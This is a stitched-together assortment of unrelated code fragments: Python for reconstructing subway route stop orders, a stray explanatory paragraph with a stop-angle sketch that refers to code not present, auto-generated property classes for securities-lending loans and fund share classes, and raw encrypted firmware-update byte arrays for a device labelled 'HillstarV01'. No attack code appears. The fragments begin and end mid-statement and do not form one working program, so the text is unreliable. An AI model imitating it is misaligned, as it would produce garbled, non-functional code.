{} # station name => RouteStop for stop in self.stops: station = stop.stoparea.station stop_name = station.name if stop_name == '?' 
and station.int_name: stop_name = station.int_name # We won't programmatically recover routes with repeating stations: # such cases are rare and deserves manual verification if stop_name in self_stops: return False self_stops[stop_name] = stop route_id = (self.colour, self.ref) if route_id not in self.city.recovery_data: return False stop_names = list(self_stops.keys()) suitable_itineraries = [] for itinerary in self.city.recovery_data[route_id]: itinerary_stop_names = [ stop['name'] for stop in itinerary['stations'] ] if not ( len(stop_names) == len(itinerary_stop_names) and sorted(stop_names) == sorted(itinerary_stop_names) ): continue big_station_displacement = False for it_stop in itinerary['stations']: name = it_stop['name'] it_stop_center = it_stop['center'] self_stop_center = self_stops[name].stoparea.station.center if ( distance(it_stop_center, self_stop_center) > DISPLACEMENT_TOLERANCE ): big_station_displacement = True break if not big_station_displacement: suitable_itineraries.append(itinerary) if len(suitable_itineraries) == 0: return False elif len(suitable_itineraries) == 1: matching_itinerary = suitable_itineraries[0] else: from_tag = self.element['tags'].get('from') to_tag = self.element['tags'].get('to') if not from_tag and not to_tag: return False matching_itineraries = [ itin for itin in suitable_itineraries if from_tag and itin['from'] == from_tag or to_tag and itin['to'] == to_tag ] if len(matching_itineraries) != 1: return False matching_itinerary = matching_itineraries[0] self.stops = [ self_stops[stop['name']] for stop in matching_itinerary['stations'] ] return True def __len__(self): return len(self.stops)
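check_stops_order_by_angle() above compares the turn a route makes at each intermediate stop against two thresholds. A minimal sketch of that test follows, assuming stops are (lon, lat) tuples; the real angle_between() and the ALLOWED_ANGLE_BETWEEN_STOPS / DISALLOWED_ANGLE_BETWEEN_STOPS constants live elsewhere in the validator, so the helper and the threshold values here are placeholders:

import math

def angle_between(p1, vertex, p2):
    # Angle at `vertex`, in degrees, between the segments vertex->p1 and vertex->p2.
    # A route that runs straight through the stop gives ~180; doubling back gives ~0.
    a1 = math.atan2(p1[1] - vertex[1], p1[0] - vertex[0])
    a2 = math.atan2(p2[1] - vertex[1], p2[0] - vertex[0])
    angle = abs(math.degrees(a1 - a2)) % 360
    return angle if angle <= 180 else 360 - angle

def classify_stop_angle(prev_stop, stop, next_stop,
                        allowed_deg=45, disallowed_deg=20):
    # Placeholder thresholds, not the project's actual constants.
    angle = angle_between(prev_stop, stop, next_stop)
    if angle >= allowed_deg:
        return 'ok'
    return 'error' if angle < disallowed_deg else 'warning'

# e.g. three roughly collinear stops pass the check:
#   classify_stop_angle((37.60, 55.75), (37.62, 55.76), (37.64, 55.77))  -> 'ok'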
asset information.""" return self.__strategy_description @strategy_description.setter def strategy_description(self, value: str): self._property_changed('strategy_description') self.__strategy_description = value @property def targeted_gross_exposure(self) -> NumberRange: """Value of a fund's long positions plus short positions, expressed in percentage terms. Only viewable after having been granted additional access to asset information.""" return self.__targeted_gross_exposure @targeted_gross_exposure.setter def targeted_gross_exposure(self, value: NumberRange): self._property_changed('targeted_gross_exposure') self.__targeted_gross_exposure = value @property def targeted_net_exposure(self) -> NumberRange: """Value of a fund's long positions minus short positions, expressed in percentage terms. Only viewable after having been granted additional access to asset information.""" return self.__targeted_net_exposure @targeted_net_exposure.setter def targeted_net_exposure(self, value: NumberRange): self._property_changed('targeted_net_exposure') self.__targeted_net_exposure = value @property def targeted_num_of_positions_short(self) -> NumberRange: """Range of positions the fund typically holds on the short side of its portfolio. Only viewable after having been granted additional access to asset information.""" return self.__targeted_num_of_positions_short @targeted_num_of_positions_short.setter def targeted_num_of_positions_short(self, value: NumberRange): self._property_changed('targeted_num_of_positions_short') self.__targeted_num_of_positions_short = value @property def targeted_num_of_positions_long(self) -> NumberRange: """Range of positions the fund typically holds on the long side of its portfolio. Only viewable after having been granted additional access to asset information.""" return self.__targeted_num_of_positions_long @targeted_num_of_positions_long.setter def targeted_num_of_positions_long(self, value: NumberRange): self._property_changed('targeted_num_of_positions_long') self.__targeted_num_of_positions_long = value @property def turnover(self) -> str: """Rate at which a fund replaces its investment holdings. Only viewable after having been granted additional access to asset information.""" return self.__turnover @turnover.setter def turnover(self, value: str): self._property_changed('turnover') self.__turnover = value @property def vehicle_type(self) -> str: """Type of investment vehicle. 
Only viewable after having been granted additional access to asset information.""" return self.__vehicle_type @vehicle_type.setter def vehicle_type(self, value: str): self._property_changed('vehicle_type') self.__vehicle_type = value @property def last_returns_date(self) -> datetime.date: """ISO 8601-formatted date""" return self.__last_returns_date @last_returns_date.setter def last_returns_date(self, value: datetime.date): self._property_changed('last_returns_date') self.__last_returns_date = value class SecuritiesLendingLoan(Base): """Parameters specific to a securities lending loan""" @camel_case_translate def __init__( self, asset_id: str, fund_id: str, lender_id: str, borrower_id: str, loan_status: str = None, settlement_status: str = None, collateral_type: str = None, loan_currency: Union[Currency, str] = None, adjustment_ind: bool = None, country_of_issue: str = None, input_date: datetime.date = None, effective_date: datetime.date = None, security_settle_date: datetime.date = None, cash_settle_date: datetime.date = None, term_date: datetime.date = None, return_date: datetime.date = None, name: str = None ): super().__init__() self.asset_id = asset_id self.fund_id = fund_id self.lender_id = lender_id self.borrower_id = borrower_id self.loan_status = loan_status self.settlement_status = settlement_status self.collateral_type = collateral_type self.loan_currency = loan_currency self.adjustment_ind = adjustment_ind self.country_of_issue = country_of_issue self.input_date = input_date self.effective_date = effective_date self.security_settle_date = security_settle_date self.cash_settle_date = cash_settle_date self.term_date = term_date self.return_date = return_date self.name = name @property def asset_id(self) -> str: """Id of the security being lent as part of this loan. This Id should tie to an Asset""" return self.__asset_id @asset_id.setter def asset_id(self, value: str): self._property_changed('asset_id') self.__asset_id = value @property def fund_id(self) -> str: """Id of the fund from which the loan is booked. This Id should tie to an Asset""" return self.__fund_id @fund_id.setter def fund_id(self, value: str): self._property_changed('fund_id') self.__fund_id = value @property def lender_id(self) -> str: """Id of the counterpart lending the security. This Id should tie to a Company""" return self.__lender_id @lender_id.setter def lender_id(self, value: str): self._property_changed('lender_id') self.__lender_id = value @property def borrower_id(self) -> str: """Id of the counterpart borrowing the security. 
This Id should tie to a Company""" return self.__borrower_id @borrower_id.setter def borrower_id(self, value: str): self._property_changed('borrower_id') self.__borrower_id = value @property def loan_status(self) -> str: """The current state of the loan""" return self.__loan_status @loan_status.setter def loan_status(self, value: str): self._property_changed('loan_status') self.__loan_status = value @property def settlement_status(self) -> str: """State of the underlying components of the loan.""" return self.__settlement_status @settlement_status.setter def settlement_status(self, value: str): self._property_changed('settlement_status') self.__settlement_status = value @property def collateral_type(self) -> str: """Type of collateral used to collateralize the loan""" return self.__collateral_type @collateral_type.setter def collateral_type(self, value: str): self._property_changed('collateral_type') self.__collateral_type = value @property def loan_currency(self) -> Union[Currency, str]: """Currency in which the loan value is represented""" return self.__loan_currency @loan_currency.setter def loan_currency(self, value: Union[Currency, str]): self._property_changed('loan_currency') self.__loan_currency = get_enum_value(Currency, value) @property def adjustment_ind(self) -> bool: """Defines whether or not this contract is for the purpose of a month end loan adjustment.""" return self.__adjustment_ind @adjustment_ind.setter def adjustment_ind(self, value: bool): self._property_changed('adjustment_ind') self.__adjustment_ind = value @property def country_of_issue(self) -> str: """The country code (ISO 3166) of the underlying security""" return self.__country_of_issue @country_of_issue.setter def country_of_issue(self, value: str): self._property_changed('country_of_issue') self.__country_of_issue = value @property def input_date(self) -> datetime.date: """Date that the loan is booked""" return self.__input_date @input_date.setter def input_date(self, value: datetime.date): self._property_changed('input_date') self.__input_date = value @property def effective_date(self) -> datetime.date: """Date of the trade""" return self.__effective_date @effective_date.setter def effective_date(self, value: datetime.date): self._property_changed('effective_date') self.__effective_date = value @property def security_settle_date(self) -> datetime.date: """Date that the loaned securities settled""" return self.__security_settle_date @security_settle_date.setter def security_settle_date(self, value: datetime.date): self._property_changed('security_settle_date') self.__security_settle_date = value @property def cash_settle_date(self) -> datetime.date: """Date of the cash collateral settled""" return self.__cash_settle_date @cash_settle_date.setter def cash_settle_date(self, value: datetime.date): self._property_changed('cash_settle_date') self.__cash_settle_date = value @property def term_date(self) -> datetime.date: """Date the dividend is paid for dividend based loans""" return self.__term_date @term_date.setter def term_date(self, value: datetime.date): self._property_changed('term_date') self.__term_date = value @property def return_date(self) -> datetime.date: """Date the loan is returned""" return self.__return_date @return_date.setter def return_date(self, value: datetime.date): self._property_changed('return_date') self.__return_date = value class ShareClassParameters(Base): """Attributes specific to share class assets""" @camel_case_translate def __init__( self, active_liquidity_fee: float = None, 
additional_provisions: str = None, benchmark: Benchmark = None, class_fees: float = None, class_type: str = None, early_redemption_fee: float = None, expense_ratio_gross: float = None, expense_ratio_net: float = None, share_class_type: str = None, gate: float = None, gate_type: str = None, hurdle: float = None, hurdle_type: str = None, investment_manager: str = None, investment_type: str = None, institutional_share_class: bool = None, lockup: float = None, lockup_type: str = None, management_fee: float = None, minimum_subscription: float = None, name: str = None, number_of_shares: float = None, performance_fee: float = None, redemption_notice_period: float = None, redemption_period: str = None, share_class_currency: str = None, side_pocket: str = None, status: str = None, sub_category: str = None, term_type: str = None ): super().__init__() self.active_liquidity_fee = active_liquidity_fee self.additional_provisions = additional_provisions self.benchmark = benchmark self.class_fees = class_fees self.class_type = class_type self.early_redemption_fee = early_redemption_fee self.expense_ratio_gross = expense_ratio_gross self.expense_ratio_net = expense_ratio_net self.share_class_type = share_class_type self.gate = gate self.gate_type = gate_type self.hurdle = hurdle self.hurdle_type = hurdle_type self.investment_manager = investment_manager self.investment_type = investment_type self.institutional_share_class = institutional_share_class self.lockup = lockup self.lockup_type = lockup_type self.management_fee = management_fee self.minimum_subscription = minimum_subscription self.name = name self.number_of_shares = number_of_shares self.performance_fee = performance_fee self.redemption_notice_period = redemption_notice_period self.redemption_period = redemption_period self.share_class_currency = share_class_currency self.side_pocket = side_pocket self.status = status self.sub_category = sub_category self.term_type = term_type @property def active_liquidity_fee(self) -> float: """Denotes percent active liquidity fee associated with this fund""" return self.__active_liquidity_fee @active_liquidity_fee.setter def active_liquidity_fee(self, value: float): self._property_changed('active_liquidity_fee') self.__active_liquidity_fee = value @property def additional_provisions(self) -> str: """Additional details that are relevant to the share class that not captured by the other fields""" return self.__additional_provisions @additional_provisions.setter def additional_provisions(self, value: str): self._property_changed('additional_provisions') self.__additional_provisions = value @property def benchmark(self) -> Benchmark: """Reference rate that can based on an absolute value or absolute value + index""" return self.__benchmark @benchmark.setter def benchmark(self, value: Benchmark): self._property_changed('benchmark') self.__benchmark = value @property def class_fees(self) -> float: """Annual cost of investing in specific shareclass, expressed in basis points""" return self.__class_fees @class_fees.setter def class_fees(self, value: float): self._property_changed('class_fees') self.__class_fees = value @property def class_type(self) -> str: """For example: B, C, Offshore, Offshore - A, etc""" return self.__class_type @class_type.setter def class_type(self, value: str): self._property_changed('class_type') self.__class_type = value @property def early_redemption_fee(self) -> float: """Fee an investor pays to redeem before the expiry of a soft lock-up""" return self.__early_redemption_fee 
@early_redemption_fee.setter def early_redemption_fee(self, value: float): self._property_changed('early_redemption_fee') self.__early_redemption_fee = value @property def expense_ratio_gross(self) -> float: """Gross expense ratio of the shareclass""" return self.__expense_ratio_gross @expense_ratio_gross.setter def expense_ratio_gross(self, value: float): self._property_changed('expense_ratio_gross') self.__expense_ratio_gross = value @property def expense_ratio_net(self) -> float: """Net expense ratio of the shareclass""" return self.__expense_ratio_net @expense_ratio_net.setter def expense_ratio_net(self, value: float): self._property_changed('expense_ratio_net') self.__expense_ratio_net = value @property def share_class_type(self) -> str: """Must be Money Market,
FW_IV = [0x42,0xea,0xff,0xf7,0x7c,0xc2,0x4f,0x2b,0x9b,0xc9,0x9d,0xe0,0x5c,0xba] # FwVersion: 1.1.18;p:HillstarV01;DSP:ID9000r2151;i:B;f:22500;nMsg;s:Rel_1r1223:MO;c:JKS;t:2014/05/20 15:37:05; FW_VERSION = [0x31,0x2e,0x31,0x2e,0x31,0x38,0x3b,0x70,0x3a,0x48,0x69,0x6c,0x6c,0x73,0x74,0x61, 0x72,0x56,0x30,0x31,0x3b,0x44,0x53,0x50,0x3a,0x49,0x44,0x39,0x30,0x30,0x30,0x72, 0x32,0x31,0x35,0x31,0x3b,0x69,0x3a,0x42,0x3b,0x66,0x3a,0x32,0x32,0x35,0x30,0x30, 0x3b,0x6e,0x4d,0x73,0x67,0x3b,0x73,0x3a,0x52,0x65,0x6c,0x5f,0x31,0x72,0x31,0x32, 0x32,0x33,0x3a,0x4d,0x4f,0x3b,0x63,0x3a,0x4a,0x4b,0x53,0x3b,0x74,0x3a,0x32,0x30, 0x31,0x34,0x2f,0x30,0x35,0x2f,0x32,0x30,0x20,0x31,0x35,0x3a,0x33,0x37,0x3a,0x30, 0x35,0x3b,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0, 0x0,0x0,0x0,0x0,0xe1,0xea,0x0,0x0] FW_UPDATE_DATA = [ [ # Record 0: Address = 0x1000, Length = 128 0x1000,0x80, 0x3,0x24,0x87,0xa4,0x18,0xc8,0x7e,0xed,0xcb,0x62,0x78,0x20,0x4d,0x48,0x4c,0x5d, 0xb7,0x0,0x1,0x2b,0x83,0xb2,0xdc,0x14,0xd9,0xb7,0x66,0xd6,0xbd,0x9d,0x60,0x97, 0x64,0x56,0x89,0xd1,0xa2,0xb2,0x18,0xed,0x79,0x7a,0x59,0x60,0x4b,0xa4,0xa5,0xc9, 0x24,0x75,0xf3,0xa4,0xe4,0x12,0xda,0xa4,0x3f,0xa1,0xf6,0x92,0x82,0x8b,0x80,0x4, 0xe1,0x4f,0x91,0xc4,0xc4,0x91,0x38,0x30,0xfe,0xd2,0xd9,0x4a,0xbe,0x4e,0xa1,0x73, 0xb0,0xa,0x2a,0x2f,0x91,0x9d,0xcf,0x3a,0x53,0xed,0xda,0xb0,0xaf,0x23,0x2b,0x6d, 0xcc,0x5b,0x76,0xa9,0x26,0x65,0xc8,0x5c,0x2d,0xb7,0x96,0xf7,0x2e,0xee,0xa5,0xc2, 0x31,0xda,0xca,0x98,0x6d,0x48,0xbd,0x86,0xdc,0xb2,0x3f,0x81,0x2e,0xde,0xac,0x41],[ # Record 1: Address = 0x1080, Length = 128 0x1080,0x80, 0xb0,0xd,0xef,0x4c,0x6a,0x60,0xde,0xf7,0xfb,0x9a,0xaa,0x46,0xe1,0x5,0x5a,0x9c, 0xa0,0x42,0xb9,0xe,0xdb,0xb5,0xfb,0xe3,0x5f,0x4d,0x3b,0x1b,0xfc,0x90,0x1f,0x3b, 0x71,0x9d,0xb5,0x34,0xda,0x41,0x47,0xdb,0xb0,0x7,0x76,0x86,0xcd,0x21,0x14,0x74, 0xbd,0xf7,0x87,0xf0,0xa5,0xb8,0xf0,0x86,0x25,0x14,0xc2,0x92,0xc4,0x9c,0x69,0x1d, 0xeb,0x3c,0x2,0x8b,0xf3,0x6,0xce,0xc7,0x4b,0x49,0x10,0x3e,0x48,0x73,0xc4,0x10, 0x5a,0x1,0xb2,0x3,0xae,0xc8,0x52,0x5b,0xdc,0x6d,0xb,0x80,0x4a,0x8,0x42,0x63, 0xfc,0x98,0x44,0x6d,0xa5,0x56,0xa2,0x63,0x16,0x3f,0x2d,0xe2,0x6f,0x7b,0xc7,0x7c, 0xe,0x3d,0x74,0x4a,0x9a,0x9,0xd0,0xa2,0x43,0xcf,0xe5,0x2f,0x69,0x1d,0xe2,0xf2],[ # Record 2: Address = 0x1100, Length = 128 0x1100,0x80, 0x2b,0x11,0xd7,0xcc,0x5a,0x18,0x76,0xd7,0x11,0x26,0x69,0x8d,0x4d,0x1,0xf0,0xde, 0x9b,0x5c,0x0,0x59,0x6c,0x55,0x1c,0xdd,0x98,0xa1,0xe5,0x88,0x68,0x18,0x68,0xd4, 0x6e,0xcd,0x9a,0x91,0x53,0x98,0x71,0x58,0xc1,0xcc,0xd4,0xe6,0x14,0x49,0xf6,0xbe, 0xa6,0x46,0x46,0xba,0x3a,0x1f,0xe8,0xcf,0xc5,0xdc,0x9d,0x81,0x49,0xd9,0x24,0x4c, 0xa8,0xd4,0x32,0xdc,0xbe,0xa4,0xc7,0x8d,0x1c,0x45,0xbd,0xb1,0x70,0xa4,0x5a,0x2, 0xd0,0x3b,0xb1,0xf5,0x9a,0xca,0x7f,0xe0,0x6c,0xfc,0x43,0x95,0x8f,0x49,0xd2,0x62, 0x93,0x10,0xb8,0x62,0xdd,0xc9,0x49,0xae,0x93,0x77,0x1b,0x8b,0x86,0x8b,0x7,0x7a, 0x4f,0xbb,0xc1,0xaf,0xf8,0xef,0xad,0x0,0x2c,0xe8,0xe1,0x4,0x79,0x5b,0x75,0x1d],[ # Record 3: Address = 0x1180, Length = 128 0x1180,0x80, 0x50,0x2,0xac,0x2f,0x1d,0x2a,0x63,0x20,0xfb,0xe2,0x84,0xd,0x35,0x12,0xeb,0x5d, 0x68,0xd4,0x5,0x12,0xae,0x4b,0x17,0x19,0xc7,0x99,0x44,0x17,0x59,0x15,0x4f,0x9c, 0x28,0x40,0x28,0x63,0xda,0x9a,0xb7,0x77,0x91,0x33,0x9c,0xf2,0x1f,0xa4,0xb2,0x12, 0x9f,0xb1,0x7e,0x3a,0xa4,0x29,0xbb,0x98,0xb6,0x1c,0xf1,0x59,0xf0,0x5e,0x23,0x48, 0xa3,0xd,0x48,0xf6,0xdf,0x7e,0x3f,0x4e,0x1d,0x98,0xe8,0x94,0x9,0xe1,0x8c,0xe2, 0x68,0xaf,0x38,0xf5,0xda,0x95,0x1b,0x8a,0x8a,0xf0,0xec,0xbb,0xaf,0xff,0x26,0x7b, 0x55,0x8e,0xa8,0xc0,0xe3,0x49,0xd3,0x99,0x5c,0x60,0x5e,0x6b,0x5f,0xa8,0x6c,0xe5, 
0xcb,0x2a,0xaf,0x75,0xee,0x23,0x1f,0x17,0x13,0xc2,0x4b,0x80,0x26,0xdf,0x65,0xf7],[ # Record 4: Address = 0x1200, Length = 128 0x1200,0x80, 0x2e,0x2d,0x5e,0xf8,0x8b,0xf0,0xb5,0xf,0x33,0x65,0x66,0x78,0x8c,0xa6,0xd,0xb1, 0x2a,0x71,0x82,0x95,0xa0,0x3e,0x3a,0x12,0x9f,0x62,0x2,0xb2,0x4a,0xb3,0xa5,0xc0, 0xd1,0xf2,0x7b,0x8a,0xd8,0x40,0x5,0x1d,0xd6,0x2f,0xbe,0xd6,0x87,0x0,0x6b,0x35, 0xf2,0x53,0xc6,0xcd,0x62,0xa7,0xc0,0x5d,0xb1,0x4b,0xbe,0xd1,0x72,0x93,0xe1,0xb9, 0x17,0xd3,0xe0,0x63,0x59,0xe5,0xb3,0x57,0x13,0x52,0x18,0x49,0x79,0x41,0x60,0xf0, 0xda,0x9f,0xf2,0xfa,0x22,0x6,0x71,0x54,0xde,0x59,0x6c,0xa7,0xc8,0xde,0xdb,0xaf, 0xc6,0xc7,0x1c,0xd9,0x79,0xdc,0x76,0x28,0x3,0xd7,0x26,0x3c,0x5,0x5,0x6c,0x92, 0xcd,0xbb,0xd9,0x46,0xcf,0x81,0x1d,0x30,0xb,0xec,0x1c,0x6b,0x22,0x42,0x29,0x25],[ # Record 5: Address = 0x1280, Length = 128 0x1280,0x80, 0x81,0x44,0xc9,0x10,0x25,0x8d,0x61,0xe8,0x4c,0x6,0xb0,0x1b,0x90,0x9d,0x84,0xe9, 0x85,0x62,0xbf,0x8e,0x51,0x3f,0x4a,0xe1,0xb3,0xdc,0xcc,0x6,0xcc,0xb0,0x7a,0x98, 0xb,0x6,0xd0,0x4e,0x16,0xf0,0x6d,0x72,0xe7,0x7,0xec,0x72,0xff,0x3a,0xa8,0xa3, 0xb9,0x1b,0x3a,0x9e,0xb8,0x5,0x1e,0xd5,0xa2,0x57,0x15,0xb7,0x2b,0x67,0x3d,0x98, 0x99,0x8a,0x55,0x35,0xc8,0x4,0x63,0x6d,0x8e,0xb9,0x6a,0xae,0x78,0xa3,0x4f,0x4e, 0xd5,0x90,0xd1,0x54,0x9,0xf7,0x71,0x1b,0x10,0x60,0xb0,0xf8,0x53,0x37,0x1f,0xcf, 0xbc,0x8f,0x7e,0xcd,0x12,0x5d,0xfb,0x5a,0x39,0xef,0x49,0x15,0x42,0x33,0x2b,0x3f, 0xae,0x54,0x8b,0xd5,0x46,0x0,0x42,0x23,0xa7,0x9e,0x98,0x27,0x80,0x12,0xb7,0xca],[ # Record 6: Address = 0x1300, Length = 128 0x1300,0x80, 0x63,0x82,0x2,0xac,0x31,0xb7,0x16,0xee,0xa0,0x1b,0x75,0xf6,0x77,0xe6,0xc4,0xeb, 0xc8,0x34,0x83,0xc3,0xd0,0xbd,0xa6,0xaa,0x2e,0xc3,0xb,0x23,0xce,0xd7,0x48,0xf, 0xc6,0x10,0x1d,0xf,0xa1,0x63,0x5d,0xd7,0xd9,0x37,0xf5,0x9d,0x7c,0xf4,0x47,0x91, 0x88,0x21,0xb6,0x13,0x34,0x1d,0x69,0x9c,0x45,0x95,0xd0,0x74,0xd,0x91,0xc7,0x7b, 0xbd,0x26,0x5f,0xaa,0x3a,0x4d,0xc5,0xb2,0x36,0x5b,0xc7,0x4f,0x77,0xa,0x32,0x45, 0x5b,0x8a,0x60,0x6d,0x29,0x90,0x22,0xc6,0x4,0x2b,0xea,0xfd,0x2b,0x6e,0x32,0xd0, 0xbb,0x6e,0x0,0x70,0xb5,0xbe,0x4d,0xc,0x34,0x32,0xec,0x13,0x52,0xb1,0x57,0xe4, 0x32,0xe2,0x76,0x78,0xee,0x7c,0x3e,0xa8,0x8e,0x97,0x33,0x1b,0x42,0x7f,0x30,0x86],[ # Record 7: Address = 0x1380, Length = 128 0x1380,0x80, 0x87,0xaf,0xe8,0x5f,0x8f,0x5e,0x15,0x53,0xf1,0x8f,0x81,0x1e,0xda,0xd8,0x93,0x18, 0xea,0x91,0x1d,0xae,0x29,0x9e,0x3,0x23,0x8e,0x81,0x64,0xc,0x4e,0x32,0x5a,0xa2, 0x4c,0xee,0x4a,0xb4,0x64,0xa2,0x51,0x6c,0x1,0x39,0x3b,0xce,0x89,0x68,0xd5,0x7, 0x8f,0xa2,0x44,0x61,0x4d,0xfd,0x26,0x69,0xee,0x4d,0x90,0x81,0xd5,0x9a,0xc5,0x59, 0x1b,0xe,0xaf,0x4,0x1d,0x88,0xec,0x5f,0x39,0x73,0x42,0xf7,0x5a,0x35,0xa0,0x69, 0xa7,0x8d,0x26,0x91,0x13,0xbd,0xd,0x1a,0xb8,0x8d,0x3e,0x19,0x41,0x38,0xeb,0x4c, 0x53,0xcd,0xe9,0x32,0x68,0xdd,0xbc,0x40,0x7a,0xf0,0x36,0xd0,0xb3,0xc4,0x9a,0x71, 0x3a,0x3c,0x8d,0xe4,0xbb,0xaa,0xd8,0x6,0x55,0x88,0xd5,0x9f,0x72,0x5f,0x8f,0xac],[ # Record 8: Address = 0x1400, Length = 128 0x1400,0x80, 0xcb,0xbc,0xbc,0x15,0x30,0xc1,0xa8,0xa8,0x1c,0x77,0xd1,0x76,0xb9,0x97,0xf3,0x15, 0x9c,0x96,0x2a,0x36,0x5b,0x47,0x4d,0xa,0xb0,0xc5,0xd8,0x36,0xe7,0x74,0x6,0x4b, 0x74,0x8,0xc,0x25,0x3a,0x5c,0xc,0x6d,0xde,0xac,0x9f,0xc6,0x3d,0xe6,0x3b,0xb2, 0xae,0x68,0xd3,0xcd,0x9a,0x83,0x76,0x5c,0x1d,0xa,0x55,0xad,0x34,0xf3,0xe3,0xd6, 0xb6,0xf5,0x91,0x30,0x24,0x1c,0xa0,0xa5,0x7c,0x6b,0xbf,0xfb,0xde,0x7d,0x6,0xc0, 0x5,0x4f,0xe6,0x8b,0x2f,0x7b,0x66,0xbc,0xb2,0x1e,0x0,0x1,0x62,0xad,0xe,0x60, 0x20,0x68,0x21,0x64,0x17,0x2e,0x14,0x87,0x69,0x73,0xc3,0xfb,0xac,0xb7,0xc2,0x95, 
0x9a,0x56,0xe3,0xd3,0x80,0xae,0xd7,0x7c,0x99,0x2f,0x50,0x54,0xbf,0xeb,0x11,0xd],[ # Record 9: Address = 0x1480, Length = 128 0x1480,0x80, 0x86,0xdf,0xb4,0xf4,0xa3,0xe1,0xbc,0x14,0xdc,0x37,0x16,0x37,0x3f,0x71,0xfb,0x4a, 0x6a,0xd2,0xca,0xd4,0x6b,0xb3,0x11,0xfa,0x6b,0xda,0x7a,0x1c,0xdb,0xbc,0x16,0xdd, 0x6b,0xd5,0x34,0x93,0x14,0x7e,0x95,0xde,0x65,0xf,0xda,0xdf,0xe1,0xdb,0xd4,0x59, 0xdc,0x6f,0x64,0xac,0xb2,0xf1,0xf9,0x10,0xf0,0xc1,0xdd,0x6a,0xbc,0x54,0x9a,0x61, 0x7d,0xc3,0x3e,0xb2,0x99,0x82,0x75,0xfc,0x7a,0x46,0xc6,0xb4,0xb0,0xcb,0x58,0x1f, 0xf5,0x5b,0x18,0xd3,0xb0,0xfc,0x0,0x14,0xf0,0x91,0x3f,0x8e,0xa8,0xbb,0xbc,0xc4, 0xe3,0x9,0xbb,0xd0,0xdc,0xc9,0xf1,0xb7,0x93,0x5d,0xab,0x40,0x79,0x35,0x6,0xef, 0xf3,0xfc,0xbe,0x14,0x30,0x28,0x18,0xfe,0x6f,0x3d,0xa9,0xaa,0xd4,0x25,0x7,0x7c],[ # Record 10: Address = 0x1500, Length = 128 0x1500,0x80, 0xe2,0x20,0x16,0xc1,0x29,0xef,0xe5,0xf0,0xbd,0x29,0x95,0x4b,0xbe,0xc0,0x1d,0x2d, 0x95,0xbd,0x77,0x5e,0x9c,0x6b,0xfb,0xef,0x92,0xdf,0x3d,0x6d,0x42,0xbd,0x5a,0x98, 0xa,0xc8,0xbb,0xc5,0xd2,0xdb,0xd0,0xc4,0x35,0xd4,0x82,0x2c,0x8b,0x86,0x39,0x2c, 0x82,0x19,0x64,0x4c,0x7f,0xf2,0xb0,0x1c,0x12,0x1a,0xd9,0xaf,0xc5,0xcf,0x42,0xc6, 0x2d,0x27,0x29,0x6b,0x1c,0x3a,0xd4,0x88,0xf2,0xa2,0x78,0xd8,0x54,0x59,0xd2,0x2d, 0x90,0x3a,0xea,0x2f,0x8c,0x97,0x24,0xd8,0xaa,0xe7,0x73,0x6f,0x6e,0x8e,0x6e,0x30, 0x8d,0xb4,0x2f,0xa3,0x8d,0x11,0x3a,0x11,0xf8,0xe5,0x4f,0xe0,0xbc,0x6f,0x88,0x2c, 0xec,0x96,0xa3,0x26,0xd1,0x7,0x5a,0x2b,0xf8,0xa9,0x1d,0xd2,0xd4,0xfa,0x31,0x57],[ # Record 11: Address = 0x1580, Length = 128 0x1580,0x80, 0x9e,0x98,0xf5,0x25,0x1f,0x19,0x85,0x89,0x23,0x0,0x8a,0x97,0x47,0x6d,0xf2,0x8, 0xe1,0xa3,0x90,0x2e,0x24,0xb7,0xca,0x96,0x7a,0x65,0x8,0xfa,0x73,0xe2,0x41,0xff, 0xb3,0x93,0xa4,0x67,0x43,0xf6,0x6b,0xba,0x8c,0x33,0x57,0xb8,0x1b,0x1,0x50,0x28, 0x2f,0xe5,0x83,0x78,0xb4,0x4d,0x54,0x37,0x3a,0xae,0x66,0x5d,0xfc,0x3b,0x87,0xa4, 0x2a,0xac,0x92,0xf8,0x2b,0xe9,0x9a,0xdb,0x2a,0x48,0x99,0xcc,0xc7,0xbe,0x10,0x43, 0xa0,0x2f,0x1c,0x62,0x19,0xf9,0x70,0x40,0x5d,0x9a,0x50,0x60,0x6e,0x2e,0x90,0x12, 0x70,0x98,0xe3,0x1,0x6f,0x42,0x9b,0xc2,0x57,0x23,0xc,0x19,0x5c,0xfa,0x43,0xf7, 0xf,0x1b,0x72,0xfb,0xef,0x48,0x12,0xaf,0x5a,0x7e,0x97,0x63,0x3d,0x87,0x14,0x86],[ # Record 12: Address = 0x1600, Length = 128 0x1600,0x80, 0x91,0x52,0x84,0xb7,0x1c,0x9a,0xdf,0x59,0xe2,0x29,0x61,0x2d,0xce,0xf8,0x60,0x46, 0x78,0xf8,0xf9,0x6c,0x92,0x19,0x64,0xde,0xe1,0x6c,0x3f,0x77,0x6,0x93,0x8d,0x20, 0x54,0x83,0x4e,0x72,0xa7,0x24,0x77,0x9,0xe,0x6f,0x15,0xcc,0xe5,0x3c,0x51,0xc0, 0xa2,0xba,0x15,0x15,0x60,0x8e,0xe2,0xaf,0x25,0xb6,0x8,0x51,0x3,0xd5,0xb1,0x66, 0x5c,0x64,0x0,0x5e,0x46,0x91,0x48,0xe4,0x7,0xcd,0xd0,0xb1,0xf3,0x8c,0x20,0xbc, 0x4a,0x94,0x40,0x99,0xe8,0x86,0x86,0x1a,0x21,0x37,0x32,0x17,0x4b,0x98,0xfe,0xe7, 0x43,0x52,0x10,0x1c,0x5,0x52,0x46,0xb5,0x7c,0x2f,0xaf,0x1e,0x72,0x3e,0x32,0x3, 0xb0,0xe3,0x5a,0xca,0x2c,0x98,0x4f,0x28,0x5f,0x32,0x8,0x62,0xbf,0x88,0xec,0x3d],[ # Record 13: Address = 0x1680, Length = 128 0x1680,0x80, 0x69,0xd2,0xea,0x9a,0xa,0x26,0xcc,0x50,0x5e,0xd3,0xff,0x13,0xf6,0xcb,0xa3,0x3c, 0xf2,0xef,0x9f,0x8d,0x2b,0xb7,0x34,0xae,0xd2,0x7,0x8d,0x6b,0xb5,0x54,0x45,0xe5, 0xbf,0xcd,0xec,0xcd,0x2a,0x49,0x2e,0xed,0xaa,0xe5,0x78,0x80,0xd5,0x5c,0x5d,0x73, 0x36,0xc5,0xa3,0x8e,0xf2,0xf3,0xf7,0xc9,0x18,0x7d,0x5,0xca,0xde,0xf1,0x13,0xdc, 0x40,0xd3,0xcb,0x18,0x1f,0xd,0xd6,0xdc,0xc9,0x77,0xa4,0xd3,0x5c,0x3b,0xc8,0x4f, 